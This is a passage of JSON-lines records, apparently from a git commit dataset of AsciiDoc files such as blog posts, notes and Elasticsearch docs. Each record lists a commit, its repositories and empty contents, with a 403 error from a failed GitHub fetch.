#13872","repos":"JervyShi\/elasticsearch,jpountz\/elasticsearch,infusionsoft\/elasticsearch,fernandozhu\/elasticsearch,wuranbo\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wenpos\/elasticsearch,nomoa\/elasticsearch,rajanm\/elasticsearch,a2lin\/elasticsearch,AndreKR\/elasticsearch,palecur\/elasticsearch,nilabhsagar\/elasticsearch,glefloch\/elasticsearch,geidies\/elasticsearch,sdauletau\/elasticsearch,gingerwizard\/elasticsearch,jeteve\/elasticsearch,pozhidaevak\/elasticsearch,AndreKR\/elasticsearch,rhoml\/elasticsearch,shreejay\/elasticsearch,zkidkid\/elasticsearch,strapdata\/elassandra5-rc,polyfractal\/elasticsearch,episerver\/elasticsearch,wbowling\/elasticsearch,fforbeck\/elasticsearch,trangvh\/elasticsearch,trangvh\/elasticsearch,uschindler\/elasticsearch,rlugojr\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,myelin\/elasticsearch,ESamir\/elasticsearch,infusionsoft\/elasticsearch,henakamaMSFT\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,fernandozhu\/elasticsearch,drewr\/elasticsearch,jeteve\/elasticsearch,obourgain\/elasticsearch,LewayneNaidoo\/elasticsearch,gmarz\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,IanvsPoplicola\/elasticsearch,jchampion\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,jchampion\/elasticsearch,schonfeld\/elasticsearch,fforbeck\/elasticsearch,scorpionvicky\/elasticsearch,kaneshin\/elasticsearch,mohit\/elasticsearch,cwurm\/elasticsearch,coding0011\/elasticsearch,nezirus\/elasticsearch,glefloch\/elasticsearch,JervyShi\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,snikch\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,sneivandt\/elasticsearch,spiegela\/elasticsearch,tebriel\/elasticsearch,rmuir\/elasticsearch,JervyShi\/elasticsearch,PhaedrusTheGreek\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,ESamir\/elasticsearch,jpountz\/elasticsearch,kalimatas\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,alexshadow007\/elasticsearch,tebriel\/elasticsearch,jprante\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,infusionsoft\/elasticsearch,scorpionvicky\/elasticsearch,nomoa\/elasticsearch,AndreKR\/elasticsearch,dpursehouse\/elasticsearch,martinstuga\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,myelin\/elasticsearch,rhoml\/elasticsearch,strapdata\/elassandra5-rc,brandonkearby\/elasticsearch,LewayneNaidoo\/elasticsearch,Shepard1212\/elasticsearch,drewr\/elasticsearch,geidies\/elasticsearch,jimczi\/elasticsearch,jpountz\/elasticsearch,alexshadow007\/elasticsearch,JackyMai\/elasticsearch,andrestc\/elasticsearch,MaineC\/elasticsearch,lks21c\/elasticsearch,IanvsPoplicola\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,wbowling\/elasticsearch,clintongormley\/elasticsearch,wuranbo\/elasticsearch,snikch\/elasticsearch,mmaracic\/elasticsearch,C-Bish\/elasticsearch,wbowling\/elasticsearch,geidies\/elasticsearch,tebriel\/elasticsearch,s1monw\/elasticsearch,jbertouch\/elasticsearch,wangtuo\/elasticsearch,rmuir\/elasticsearch,gingerwizard\/elasticsearch,diendt\/elasticsearch,wuranbo\/elasticsearch,iacdingping\/elasticsearch,Collaborne\/elasticsearch,davidvgalbraith\/elasticsearch,i-am-Nathan\/elasticsearch,fforbeck\/elasticsearch,cwurm\/elasticsearch,umeshdangat\/elasticsearch,jprante\/elasticsearch,girirajsharma\/elasticsearch,kaneshin\/elasticsearch,spiegela\/elasticsearch,Shepard1212\/elasticsearch,mapr\/elasticsearch,polyfractal\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,drewr\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,Collaborne\/elasticsearch,tebriel\/elasticsearch,JackyMai\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra,dongjoon-hyun\/elasticsearch,qwerty4030\/elasticsearch,StefanGor\/elasticsearch,nilabhsagar\/elasticsearch,Stacey-Gammon\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,a2lin\/elasticsearch,yanjunh\/elasticsearch,sreeramjayan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,polyfractal\/elasticsearch,liweinan0423\/elasticsearch,liweinan0423\/elasticsearch,fred84\/elasticsearch,IanvsPoplicola\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch,nomoa\/elasticsearch,jprante\/elasticsearch,jeteve\/elasticsearch,dongjoon-hyun\/elasticsearch,JervyShi\/elasticsearch,socialrank\/elasticsearch,F0lha\/elasticsearch,martinstuga\/elasticsearch,mmaracic\/elasticsearch,yanjunh\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,snikch\/elasticsearch,iacdingping\/elasticsearch,gfyoung\/elasticsearch,schonfeld\/elasticsearch,F0lha\/elasticsearch,cwurm\/elasticsearch,alexshadow007\/elasticsearch,vroyer\/elasticassandra,elasticdog\/elasticsearch,dpursehouse\/elasticsearch,nknize\/elasticsearch,schonfeld\/elasticsearch,MaineC\/elasticsearch,s1monw\/elasticsearch,trangvh\/elasticsearch,mmaracic\/elasticsearch,PhaedrusTheGreek\/elasticsearch,iacdingping\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,andrejserafim\/elasticsearch,LeoYao\/elasticsearch,markharwood\/elasticsearch,infusionsoft\/elasticsearch,mjason3\/elasticsearch,xuzha\/elasticsearch,fforbeck\/elasticsearch,jimczi\/elasticsearch,GlenRSmith\/elasticsearch,dongjoon-hyun\/elasticsearch,umeshdangat\/elasticsearch,jchampion\/elasticsearch,winstonewert\/elasticsearch,JSCooke\/elasticsearch,myelin\/elasticsearch,ricardocerq\/elasticsearch,MaineC\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,markwalkom\/elasticsearch,xuzha\/elasticsearch,HonzaKral\/elasticsearch,sdauletau\/elasticsearch,sneivandt\/elasticsearch,spiegela\/elasticsearch,henakamaMSFT\/elasticsearch,Collaborne\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,rmuir\/elasticsearch,GlenRSmith\/elasticsearch,JackyMai\/elasticsearch,kaneshin\/elasticsearch,JSCooke\/elasticsearch,awislowski\/elasticsearch,wenpos\/elasticsearch,henakamaMSFT\/elasticsearch,jchampion\/elasticsearch,schonfeld\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,iacdingping\/elasticsearch,dpursehouse\/elasticsearch,wbowling\/elasticsearch,cwurm\/elasticsearch,infusionsoft\/elasticsearch,nknize\/elasticsearch,polyfractal\/elasticsearch,yynil\/elasticsearch,zkidkid\/elasticsearch,gmarz\/elasticsearch,andrestc\/elasticsearch,Collaborne\/elasticsearch,infusionsoft\/elasticsearch,davidvgalbraith\/elasticsearch,jbertouch\/elasticsearch,gingerwizard\/elasticsearch,davidvgalbraith\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,yynil\/elasticsearch,liweinan0423\/elasticsearch,shreejay\/elasticsearch,PhaedrusTheGreek\/elasticsearch,elasticdog\/elasticsearch,jeteve\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,mapr\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,jbertouch\/elasticsearch,ESamir\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,schonfeld\/elasticsearch,Shepard1212\/elasticsearch,sdauletau\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,iacdingping\/elasticsearch,yynil\/elasticsearch,AndreKR\/elasticsearch,rlugojr\/elasticsearch,sdauletau\/elasticsearch,awislowski\/elasticsearch,gmarz\/elasticsearch,robin13\/elasticsearch,tebriel\/elasticsearch,mjason3\/elasticsearch,martinstuga\/elasticsearch,F0lha\/elasticsearch,dpursehouse\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,davidvgalbraith\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,zkidkid\/elasticsearch,clintongormley\/elasticsearch,episerver\/elasticsearch,ricardocerq\/elasticsearch,mmaracic\/elasticsearch,MisterAndersen\/elasticsearch,sreeramjayan\/elasticsearch,polyfractal\/elasticsearch,scorpionvicky\/elasticsearch,IanvsPoplicola\/elasticsearch,jeteve\/elasticsearch,ZTE-PaaS\/elasticsearch,mapr\/elasticsearch,JackyMai\/elasticsearch,yanjunh\/elasticsearch,polyfractal\/elasticsearch,alexshadow007\/elasticsearch,jpountz\/elasticsearch,mjason3\/elasticsearch,nilabhsagar\/elasticsearch,wbowling\/elasticsearch,andrestc\/elasticsearch,xuzha\/elasticsearch,kaneshin\/elasticsearch,bawse\/elasticsearch,i-am-Nathan\/elasticsearch,rmuir\/elasticsearch,andrejserafim\/elasticsearch,robin13\/elasticsearch,palecur\/elasticsearch,markharwood\/elasticsearch,mortonsykes\/elasticsearch,schonfeld\/elasticsearch,obourgain\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,markharwood\/elasticsearch,palecur\/elasticsearch,jpountz\/elasticsearch,GlenRSmith\/elasticsearch,wuranbo\/elasticsearch,PhaedrusTheGreek\/elasticsearch,sreeramjayan\/elasticsearch,mapr\/elasticsearch,socialrank\/elasticsearch,obourgain\/elasticsearch,uschindler\/elasticsearch,ricardocerq\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,schonfeld\/elasticsearch,mohit\/elasticsearch,MisterAndersen\/elasticsearch,socialrank\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,rhoml\/elasticsearch,lks21c\/elasticsearch,AndreKR\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,socialrank\/elasticsearch,wangtuo\/elasticsearch,episerver\/elasticsearch,PhaedrusTheGreek\/elasticsearch,nknize\/elasticsearch,avikurapati\/elasticsearch,andrejserafim\/elasticsearch,diendt\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,a2lin\/elasticsearch,jchampion\/elasticsearch,mmaracic\/elasticsearch,wenpos\/elasticsearch,artnowo\/elasticsearch,JSCooke\/elasticsearch,LewayneNaidoo\/elasticsearch,sneivandt\/elasticsearch,avikurapati\/elasticsearch,s1monw\/elasticsearch,dongjoon-hyun\/elasticsearch,vroyer\/elasticassandra,F0lha\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elasticassandra,jpountz\/elasticsearch,wangtuo\/elasticsearch,zkidkid\/elasticsearch,LeoYao\/elasticsearch,nilabhsagar\/elasticsearch,ricardocerq\/elasticsearch,clintongormley\/elasticsearch,qwerty4030\/elasticsearch,JervyShi\/elasticsearch,liweinan0423\/elasticsearch,spiegela\/elasticsearch,C-Bish\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,sreeramjayan\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,andrestc\/elasticsearch,jimczi\/elasticsearch,trangvh\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,sreeramjayan\/elasticsearch,wuranbo\/elasticsearch,maddin2016\/elasticsearch,socialrank\/elasticsearch,jchampion\/elasticsearch,clintongormley\/elasticsearch,girirajsharma\/elasticsearch,strapdata\/elassandra5-rc,Collaborne\/elasticsearch,kaneshin\/elasticsearch,nomoa\/elasticsearch,gmarz\/elasticsearch,robin13\/elasticsearch,diendt\/elasticsearch,uschindler\/elasticsearch,dpursehouse\/elasticsearch,awislowski\/elasticsearch,mortonsykes\/elasticsearch,ESamir\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,drewr\/elasticsearch,mapr\/elasticsearch,diendt\/elasticsearch,mikemccand\/elasticsearch,zkidkid\/elasticsearch,a2lin\/elasticsearch,liweinan0423\/elasticsearch,infusionsoft\/elasticsearch,PhaedrusTheGreek\/elasticsearch,andrestc\/elasticsearch,episerver\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,ricardocerq\/elasticsearch,pozhidaevak\/elasticsearch,iacdingping\/elasticsearch,ZTE-PaaS\/elasticsearch,rmuir\/elasticsearch,ivansun1010\/elasticsearch,HonzaKral\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,wbowling\/elasticsearch,dongjoon-hyun\/elasticsearch,Helen-Zhao\/elasticsearch,awislowski\/elasticsearch,mortonsykes\/elasticsearch,fforbeck\/elasticsearch,sdauletau\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,camilojd\/elasticsearch,artnowo\/elasticsearch,diendt\/elasticsearch,ivansun1010\/elasticsearch,girirajsharma\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,socialrank\/elasticsearch,yanjunh\/elasticsearch,girirajsharma\/elasticsearch,masaruh\/elasticsearch,gmarz\/elasticsearch,davidvgalbraith\/elasticsearch,yynil\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,awislowski\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,yynil\/elasticsearch,tebriel\/elasticsearch,JackyMai\/elasticsearch,ivansun1010\/elasticsearch,rhoml\/elasticsearch,AndreKR\/elasticsearch,elasticdog\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,camilojd\/elasticsearch,qwerty4030\/elasticsearch,snikch\/elasticsearch,palecur\/elasticsearch,maddin2016\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,davidvgalbraith\/elasticsearch,rajanm\/elasticsearch,andrestc\/elasticsearch,shreejay\/elasticsearch,njlawton\/elasticsearch,martinstuga\/elasticsearch,myelin\/elasticsearch,i-am-Nathan\/elasticsearch,strapdata\/elassandra,trangvh\/elasticsearch,obourgain\/elasticsearch,kaneshin\/elasticsearch,henakamaMSFT\/elasticsearch,palecur\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,camilojd\/elasticsearch,andrejserafim\/elasticsearch,shreejay\/elasticsearch,markharwood\/elasticsearch,yynil\/elasticsearch,mikemccand\/elasticsearch,drewr\/elasticsearch,F0lha\/elasticsearch,jeteve\/elasticsearch,StefanGor\/elasticsearch,girirajsharma\/elasticsearch,umeshdangat\/elasticsearch,Collaborne\/elasticsearch,avikurapati\/elasticsearch,LewayneNaidoo\/elasticsearch,pozhidaevak\/elasticsearch,ivansun1010\/elasticsearch,ESamir\/elasticsearch,F0lha\/elasticsearch,drewr\/elasticsearch,girirajsharma\/elasticsearch,njlawton\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,masaruh\/elasticsearch,jbertouch\/elasticsearch,MisterAndersen\/elasticsearch,iacdingping\/elasticsearch,camilojd\/elasticsearch,rlugojr\/elasticsearch,naveenhooda2000\/elasticsearch,drewr\/elasticsearch,jprante\/elasticsearch,ESamir\/elasticsearch,elasticdog\/elasticsearch,rajanm\/elasticsearch,episerver\/elasticsearch,diendt\/elasticsearch,andrestc\/elasticsearch,andrejserafim\/elasticsearch,fred84\/elasticsearch,sdauletau\/elasticsearch,jimczi\/elasticsearch,avikurapati\/elasticsearch,Stacey-Gammon\/elasticsearch,mikemccand\/elasticsearch,Collaborne\/elasticsearch,winstonewert\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ivansun1010\/elasticsearch,coding0011\/elasticsearch,nomoa\/elasticsearch,MaineC\/elasticsearch,shreejay\/elasticsearch,clintongormley\/elasticsearch,ivansun1010\/elasticsearch,mikemccand\/elasticsearch,Helen-Zhao\/elasticsearch,scottsom\/elasticsearch,spiegela\/elasticsearch,jeteve\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,mjason3\/elasticsearch,umeshdangat\/elasticsearch,camilojd\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,fernandozhu\/elasticsearch,myelin\/elasticsearch,uschindler\/elasticsearch,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,snikch\/elasticsearch,vroyer\/elassandra,jbertouch\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,clintongormley\/elasticsearch,LeoYao\/elasticsearch,cwurm\/elasticsearch,avikurapati\/elasticsearch,markharwood\/elasticsearch,coding0011\/elasticsearch,sdauletau\/elasticsearch,Helen-Zhao\/elasticsearch,snikch\/elasticsearch,JervyShi\/elasticsearch,Shepard1212\/elasticsearch,martinstuga\/elasticsearch,socialrank\/elasticsearch,bawse\/elasticsearch,glefloch\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,martinstuga\/elasticsearch,artnowo\/elasticsearch,sreeramjayan\/elasticsearch,nazarewk\/elasticsearch,sneivandt\/elasticsearch,C-Bish\/elasticsearch,mapr\/elasticsearch,mortonsykes\/elasticsearch,nezirus\/elasticsearch,xuzha\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wbowling\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,xuzha\/elasticsearch,mmaracic\/elasticsearch,jbertouch\/elasticsearch,ZTE-PaaS\/elasticsearch,strapdata\/elassandra5-rc,rmuir\/elasticsearch,naveenhooda2000\/elasticsearch,markharwood\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,andrejserafim\/elasticsearch,JSCooke\/elasticsearch,HonzaKral\/elasticsearch,rhoml\/elasticsearch,JSCooke\/elasticsearch,rhoml\/elasticsearch,i-am-Nathan\/elasticsearch,naveenhooda2000\/elasticsearch,xuzha\/elasticsearch,strapdata\/elassandra5-rc","old_file":"docs\/reference\/indices\/get-settings.asciidoc","new_file":"docs\/reference\/indices\/get-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f2a353d3a20f489c5ea17983cedfb9bb377509fe","subject":"Publish 20161110-1328-have-fun.adoc","message":"Publish 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1328-have-fun.adoc","new_file":"20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ffdd7ca7209fedb7fb7c1552cfbc4bdb4126b3a","subject":"Add to NOTES.adoc","message":"Add to NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22b4874ff6575564183de0736a8a7a4c33ad3ce3","subject":"Create 2014-10-06-forge-2.12.0.final.asciidoc","message":"Create 2014-10-06-forge-2.12.0.final.asciidoc","repos":"luiz158\/docs,luiz158\/docs,agoncal\/docs,addonis1990\/docs,addonis1990\/docs,forge\/docs,forge\/docs,agoncal\/docs","old_file":"news\/2014-10-06-forge-2.12.0.final.asciidoc","new_file":"news\/2014-10-06-forge-2.12.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6490203e767e27e2a8d90b62e69e53e3f1477357","subject":"Update 2015-12-14-Foo.adoc","message":"Update 2015-12-14-Foo.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2015-12-14-Foo.adoc","new_file":"_posts\/2015-12-14-Foo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a128dbea0d00b25961be1382270dcd7515db5ed8","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"541439d17e86b61587e303a91cab62b9d8f8762c","subject":"Update 2017-02-05-hui.adoc","message":"Update 2017-02-05-hui.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-02-05-hui.adoc","new_file":"_posts\/2017-02-05-hui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fd8c9d506283e810b77eced252072f208f07f5e","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aa15351865386508dabbeb8fe05a56f2f7c6c79","subject":"Update 2015-08-15-Creating-a-Custom-CDN-with-Python-and-Django.adoc","message":"Update 2015-08-15-Creating-a-Custom-CDN-with-Python-and-Django.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2015-08-15-Creating-a-Custom-CDN-with-Python-and-Django.adoc","new_file":"_posts\/2015-08-15-Creating-a-Custom-CDN-with-Python-and-Django.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joao-bjsoftware\/joao-bjsoftware.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3e53fdd59d2e2ac33977eca2646603c1a8315a7","subject":"CL: tilde\/home directory expansion","message":"CL: tilde\/home directory expansion\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c1029fdf11e9febae1e5da6e4be7e4440b2f8262","subject":"CL: Getting path to a system loaded with ASDF","message":"CL: Getting path to a system loaded with ASDF\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d46e362e75a6886b0be33a3d4f4014e41c06af29","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee47ab0c620cc55de6af410a3afe6ecd722e6cd2","subject":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"803f5b2e925100f8f2d865a7ec08f218b7510bc5","subject":"added readme","message":"added readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"openshift\/healthdemo\/README.adoc","new_file":"openshift\/healthdemo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a98b11d8f39815c4585d83451d823f90a0c1d961","subject":"Create 2016-05-13-Engineer-Career-Path.adoc","message":"Create 2016-05-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8bc879552c00719c4093785b23a8948e9e50c60","subject":"Renamed '_posts\/2019-01-31-My-English-Title.adoc' to '_posts\/2019-01-31-how-to-learn-Android.adoc'","message":"Renamed '_posts\/2019-01-31-My-English-Title.adoc' to '_posts\/2019-01-31-how-to-learn-Android.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-how-to-learn-Android.adoc","new_file":"_posts\/2019-01-31-how-to-learn-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17a861c8a68df9724eb1096f89ae5aa5c20756d2","subject":"Fix issue #239 - Replace link to Compose file","message":"Fix issue #239 - Replace link to Compose file\n\nLink to the Compose file in setup has been replaced from https:\/\/github.com\/docker\/labs\/blob\/master\/developer-tools\/java\/scripts\/docker-compose-pull-images.yml to https:\/\/raw.githubusercontent.com\/docker\/labs\/master\/developer-tools\/java\/scripts\/docker-compose-pull-images.yml as pointed by @arun-gupta","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c28136923968fa5bfb7791584a108777813dee7","subject":"Create welcome.adoc","message":"Create welcome.adoc","repos":"ramrexx\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,ramrexx\/CloudForms_Essentials","old_file":"welcome.adoc","new_file":"welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/weslleyrosalem\/CloudForms_Essentials.git\/': The requested URL returned error: 